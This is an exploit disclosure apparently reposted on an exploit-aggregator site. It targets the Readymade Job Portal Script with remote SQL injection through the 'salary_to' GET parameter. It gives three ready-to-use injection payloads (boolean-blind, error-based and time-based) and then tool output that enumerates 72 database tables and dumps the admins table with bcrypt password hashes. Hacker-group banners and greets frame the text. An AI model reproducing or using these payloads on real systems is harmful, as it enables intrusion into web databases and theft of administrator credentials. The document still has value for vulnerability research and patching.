Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080046

Below is a copy:

Readymade Job Portal Script SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                       [ Exploits ]                                   

:  Author   : CraCkEr                                                                  :
  Website  : i-netsolution.com                                                        
  Vendor   : i-Net Solution                                                           
  Software : Readymade Job Portal Script       Job Portal is a website that serves    
  Vuln Type: Remote SQL Injection              as a bridge between employers          
  Method   : GET                               and job seekers                        
  Impact   : Database Access                                                          
                                                                                      
 
                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise.                                                                    
                                                                                        

                                                                                      


Greets:
       
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7
       
CryptoJob (Twitter) twitter.com/CryptozJob
   

                                      CraCkEr 2022                                   



GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---

[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)


[INFO] fetching current database
current database: 'theminsall_jobportal_db'


[INFO] fetching tables for database: 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets            |
| admins                           |
| applicant_messages               |
| blog_categories                  |
| blogs                            |
| career_levels                    |
| cities                           |
| cms                              |
| cms_content                      |
| companies                        |
| company_messages                 |
| company_password_resets          |
| contact_messages                 |
| countries                        |
| countries_details                |
| degree_levels                    |
| degree_types                     |
| failed_jobs                      |
| faqs                             |
| favourite_applicants             |
| favourites_company               |
| favourites_job                   |
| functional_areas                 |
| genders                          |
| industries                       |
| job_alerts                       |
| job_apply                        |
| job_apply_rejected               |
| job_experiences                  |
| job_shifts                       |
| job_skills                       |
| job_titles                       |
| job_types                        |
| jobs                             |
| language_levels                  |
| languages                        |
| major_subjects                   |
| manage_job_skills                |
| marital_statuses                 |
| migrations                       |
| ownership_types                  |
| packages                         |
| password_resets                  |
| payu_transactions                |
| profile_cvs                      |
| profile_education_major_subjects |
| profile_educations               |
| profile_experiences              |
| profile_languages                |
| profile_projects                 |
| profile_skills                   |
| profile_summaries                |
| queue_jobs                       |
| report_abuse_company_messages    |
| report_abuse_messages            |
| result_types                     |
| roles                            |
| salary_periods                   |
| send_to_friend_messages          |
| seo                              |
| site_settings                    |
| sliders                          |
| states                           |
| subscriptions                    |
| testimonials                     |
| unlocked_users                   |
| user_messages                    |
| users                            |
| videos                           |
| widget_pages                     |
| widgets                          |
| widgets_data                     |
+----------------------------------+


[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| created_at     | timestamp        |
| email          | varchar(191)     |
| id             | int(10) unsigned |
| name           | varchar(191)     |
| password       | varchar(191)     |
| remember_token | varchar(100)     |
| role_id        | int(11)          |
| updated_at     | timestamp        |
+----------------+------------------+


[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email              | password                                                     | name      |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3  | [email protected]    | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer     |
| 4  | [email protected] | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5  | [email protected]    | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin     |
+----+--------------------+--------------------------------------------------------------+-----------+
                            Possible Algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.